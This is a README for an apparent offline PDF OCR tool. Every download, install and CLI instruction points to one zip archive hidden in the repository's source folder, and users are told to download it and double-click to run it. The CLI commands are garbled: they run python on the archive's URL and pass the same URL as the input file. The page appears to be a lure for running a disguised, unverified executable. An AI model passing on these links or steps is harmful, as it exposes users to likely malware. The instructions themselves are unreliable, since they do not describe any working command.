Welcome to local-llm-pdf-ocr. This application helps you convert scanned PDFs into searchable text using Vision LLMs. It runs fully offline, preserving your privacy while delivering powerful features.
- Privacy-Focused: Your documents remain on your device.
- Modern Web UI: User-friendly interface to make your experience smooth.
- Command Line Interface: For advanced users who prefer command-line tools.
- Fast OCR: Quick processing of scanned PDFs to turn images into searchable text.
- No API Key Required: Works fully offline without needing any external services.
- Operating System: Windows, macOS, or Linux.
- RAM: Minimum 4 GB recommended.
- Storage: At least 500 MB of free space.
- Python: Version 3.7 or above installed on your system, if using CLI.
To start using local-llm-pdf-ocr, visit the Releases page to download the latest version.
- Go to the Releases page.
- Find the latest release at the top of the list.
- Click on the file that matches your operating system (for example,
https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zipfor Windows). - Once downloaded, locate the file and double click to run it.
After installation:
- For the Web UI: Open your browser and go to
http://localhost:8000. - For the CLI: Open your terminal (Command Prompt, Terminal, or Shell) and navigate to the installation folder. Use the command
python https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zipto start the program.
You can easily import your PDFs:
- For Web UI: Click on the "Upload PDF" button and select your scanned document.
- For CLI: Use the command
python https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zip --input https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zipto process a PDF.
The application converts the scanned content into a searchable PDF. You can save this file on your computer or open it directly once the conversion is finished.
This application uses a variety of technologies to deliver its service efficiently. Here are some related topics:
- Document Processing: Handle your documents effectively.
- FastAPI: Enjoy high performance while processing.
- Local LLM Technology: Utilize machine learning for local processing.
- OCR (Optical Character Recognition): Convert images into editable text.
- Offline AI: Work without an internet connection.
If you encounter issues during installation or the usage of local-llm-pdf-ocr, here are some common solutions:
- File Not Opening: Ensure you have the correct permissions to execute the file.
- Error Messages: Check if your Python version is supported.
- Performance Issues: Close any unnecessary applications that may be using system resources.
For further assistance or to report issues, please visit our GitHub Issues page. We’re here to help you.
local-llm-pdf-ocr is free and open-source software. You can modify and share it under the terms of the MIT License.
Thank you for choosing local-llm-pdf-ocr for your PDF processing needs. Enjoy the power of offline conversion and searchable content with complete privacy!